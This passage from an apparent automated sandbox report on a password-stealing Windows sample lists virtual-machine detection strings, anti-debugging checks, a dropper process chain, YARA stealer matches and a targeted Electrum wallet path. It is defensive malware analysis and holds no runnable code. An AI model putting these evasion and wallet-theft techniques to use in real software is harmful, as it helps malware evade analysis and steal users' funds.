                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
                        Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2016 Server Standard without Hyper-V (core)
                        Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8 Server Standard without Hyper-V (core)
                        Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
                        Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
                        Source: a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: xVBoxService.exe
                        Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
                        Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: *Windows 11 Server Standard without Hyper-V
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: ,Windows 2016 Server Standard without Hyper-V
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 Server Standard without Hyper-V (core)
                        Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
                        Source: a37ec701f3.exe, 0000000B.00000002.1970868241.0000000001414000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                        Source: a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: VBoxService.exe
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8.1 Server Standard without Hyper-V
                        Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: *Windows 10 Server Standard without Hyper-V
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
                        Source: a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: VMWare
                        Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001ABE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: #Windows 11 Microsoft Hyper-V Server
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSystem information queried: ModuleInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: regmonclass
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: gbdyllo
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: procmon_window_class
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: ollydbg
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: filemonclass
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: NTICE
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: SICE
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: SIWVID
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeCode function: 5_2_04BB0681 rdtsc 5_2_04BB0681
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C525FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,0_2_6C525FF0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C52C410 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_6C52C410
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 8_2_007F643B mov eax, dword ptr fs:[00000030h]8_2_007F643B
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 8_2_007FA1A2 mov eax, dword ptr fs:[00000030h]8_2_007FA1A2
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4FB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6C4FB66C
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4FB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6C4FB1F7
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\ECGHCBGCBF.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe "C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess created: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe "C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe" Jump to behavior
                        Source: BGIIDAEBGC.exe, 00000005.00000002.1905859514.0000000000698000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: 6Program Manager
                        Source: BGIIDAEBGC.exeBinary or memory string: 6Program Manager
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4FB341 cpuid 0_2_6C4FB341
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4C35A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp,0_2_6C4C35A0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F771FA0 GetUserNameA,11_2_7F771FA0
                        Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                        Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
                        Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                        Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 16.2.explorti.exe.7c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.explorti.exe.7c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.explorti.exe.7c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.BGIIDAEBGC.exe.4b0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.explorti.exe.7c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.explorti.exe.7c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000E.00000002.2741394085.00000000007C1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.4133532873.00000000007C1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000003.3899911028.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000003.3299622243.00000000052A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3339913587.00000000007C1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.3940474220.00000000007C1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.1905744042.00000000004B1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000003.1865490061.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.2140215620.00000000007C1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000003.1899129257.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000003.2700865655.0000000005270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000003.2099937610.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 11.2.a37ec701f3.exe.120000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe.de0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1850057063.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1969439309.0000000000121000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1970868241.0000000001414000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1852046462.0000000001ABE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe PID: 7352, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: a37ec701f3.exe PID: 7344, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 11.2.a37ec701f3.exe.120000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe.de0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1850057063.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1969439309.0000000000121000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe PID: 7352, type: MEMORYSTR
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001B0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\\Electrum\wallets\\*.*
